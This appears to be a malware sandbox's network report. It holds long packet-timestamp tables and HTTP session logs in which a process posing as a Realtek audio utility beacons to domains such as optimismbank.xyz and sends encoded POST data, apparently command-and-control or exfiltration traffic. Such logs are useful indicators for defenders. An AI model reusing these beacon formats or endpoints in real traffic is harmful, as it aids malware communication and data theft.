                                                                            Dec 3, 2024 18:56:22.289702892 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.289954901 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:22.293411970 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:22.625422001 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.625554085 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.625566006 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.625732899 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:23.809555054 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:24.825762033 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:25.165873051 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.166110039 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:25.169666052 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:25.509712934 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.509771109 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.509803057 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.510004044 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:26.684005022 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:27.700092077 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:57:41.940838099 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:41.941204071 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:41.941246033 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724123001 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724138975 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724152088 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724163055 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724317074 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.724420071 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.871663094 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.871711969 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.871895075 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.872592926 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.872843981 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.872900963 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.872937918 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.873042107 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.873092890 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.874455929 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874681950 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874741077 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874784946 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874831915 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874898911 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874911070 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.874943018 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.875025034 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.875130892 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.916642904 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:43.003367901 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.003376007 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.003381968 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.003590107 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:43.004251003 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.004499912 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:43.323312044 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.339651108 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.466362000 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:44.466814995 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.470689058 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.597280979 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:45.448976994 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:45.450135946 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:45.450378895 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:45.450925112 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:45.577282906 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:50.628071070 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:50.754358053 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:50.754503965 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:50.758130074 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:50.884538889 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285345078 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285422087 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285510063 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285621881 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:51.285949945 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.286096096 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:52.259030104 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.275032043 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.400907993 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.401163101 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.404745102 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.530544996 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924298048 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924343109 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924376965 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924561024 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.924746037 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924928904 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:54.914513111 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:55.930696964 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.056838036 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.057008982 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.060842991 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.060902119 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.060959101 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.186902046 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.187047005 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.187371969 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.613667965 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.613677979 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.613862991 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.614345074 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.614540100 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:57.570171118 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.586389065 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.712881088 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:58.713156939 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.715545893 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.841934919 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.220752001 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.220797062 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.221096039 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:59.221345901 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.221565008 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:59.222258091 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:59.348587036 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:58:04.593969107 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:04.782093048 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.782417059 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:04.785938978 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:04.973994017 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994240999 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994303942 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994338989 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994519949 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:06.287014008 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.303225994 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.492161989 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.492470026 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.500086069 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.689697027 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.690882921 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.691257954 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.691262007 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.692390919 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:09.005191088 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.021338940 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.209114075 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.209269047 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.212886095 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.213011026 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.400862932 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.400937080 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401246071 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401295900 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401407003 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401441097 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401520967 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.589611053 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:12.739504099 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:12.928325891 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:12.928524017 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:12.930947065 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.119584084 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.119966984 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.119992018 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.120168924 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.120260954 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.120363951 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.120938063 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.309295893 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:44.072340012 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.445893049 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.446127892 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.448559046 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.821897030 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822220087 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822318077 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822355032 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822679996 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.823317051 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:45.196387053 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:49.825159073 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:49.979548931 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:49.979901075 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:49.983441114 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:50.135910988 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:50.141114950 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:50.141283035 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:51.495863914 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:51.648638964 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.512048960 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:52.665218115 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.665527105 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:52.669116974 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:52.821269989 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.821348906 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.821549892 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:54.182749033 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:54.334810019 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.198930025 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.354604959 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.354831934 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.358460903 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.358531952 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.513180017 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513375998 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513412952 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513614893 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513652086 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513675928 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:57.885839939 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.044049025 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.044770002 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.047234058 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.204336882 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.206229925 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.206294060 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.206605911 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.207321882 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.364492893 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:59:03.212795973 CET4981180192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:03.401417971 CET8049811209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:03.401626110 CET4981180192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 19:00:21.476269007 CET8049834101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:21.476588964 CET4983480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:21.477232933 CET4983480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 19:00:21.818963051 CET8049834101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 19:00:26.491342068 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:26.851093054 CET804983538.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:26.851319075 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:26.854875088 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:27.214847088 CET804983538.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:27.215039968 CET804983538.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:27.215291977 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:28.365135908 CET4983580192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:29.381371975 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:29.742224932 CET804983638.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:29.742410898 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:29.745966911 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:30.111387014 CET804983638.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:30.111435890 CET804983638.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:30.112224102 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:31.255181074 CET4983680192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.271434069 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.612479925 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.612716913 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.616333961 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.616430044 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:32.957693100 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.957735062 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958045959 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958338976 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958389997 CET804983738.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:32.958544016 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:34.129570961 CET4983780192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.145662069 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.484428883 CET804983838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:35.484616995 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.487014055 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.825947046 CET804983838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:35.826168060 CET804983838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 19:00:35.826457024 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:35.827109098 CET4983880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 19:00:36.165729046 CET804983838.47.232.202192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49749 | 202.92.5.23 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:54:55.301713943 CET | 488 | OUT | GET /fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.thaor56.online
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:54:55.669975996 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:54:55 GMT
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Dec 3, 2024 18:54:55.670022964 CET | 181 | IN
                                                                            Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49750 | 13.248.169.48 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:55:11.037081003 CET | 767 | OUT | POST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMo1MlJequvVvLUXXfxGfKgroEKyNwxdeJOA==


                                                                            Session ID: 2 | Source IP: 192.168.11.20 | Source Port: 49751 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:13.717525959 CET | Bytes transferred: 787 | Direction: OUT | Data:
                                                                            POST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj402OC0YzffSTGIUVBsWL3aqckRLQLYTOf0=


                                                                            Session ID: 3 | Source IP: 192.168.11.20 | Source Port: 49752 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:16.407412052 CET | Bytes transferred: 7936 | Direction: OUT | Data:
                                                                            POST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O= [TRUNCATED]


                                                                            Session ID: 4 | Source IP: 192.168.11.20 | Source Port: 49753 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:19.092852116 CET | Bytes transferred: 490 | Direction: OUT | Data:
